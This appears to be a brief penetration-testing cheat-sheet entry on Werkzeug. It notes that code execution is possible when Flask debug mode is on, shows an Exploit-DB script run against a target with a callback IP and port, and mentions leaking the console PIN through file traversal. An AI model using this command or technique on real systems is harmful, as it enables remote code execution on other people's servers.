Werkzeug

Suffers from known code execution vulnerability if Flask Debug is enabled

$ python2 /usr/share/exploitdb/exploits/multiple/remote/43905.py 10.10.11.160 5000 10.10.14.26 4488
[-] Debug is not enabled

Console PIN Exploit

In some occasions the /console endpoint is going to be protected by a pin. If you have a file traversal vulnerability, you can leak all the necessary info to generate that pin.

Find indepth information here.